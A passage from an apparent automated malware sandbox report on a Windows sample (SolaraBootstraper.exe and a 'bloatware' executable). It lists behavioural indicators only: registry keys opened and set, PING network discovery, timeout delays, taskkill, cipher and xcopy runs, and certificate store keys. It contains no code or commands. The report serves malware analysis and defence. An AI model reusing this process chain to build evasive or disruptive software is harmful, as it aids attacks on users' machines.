| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cipher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
NSIS installer
(4 matches; no indicator details recorded)
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "282" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437219416" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "0" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "10998" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B65CF41-9DB2-11EF-AE37-6A7FEBC734DB} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
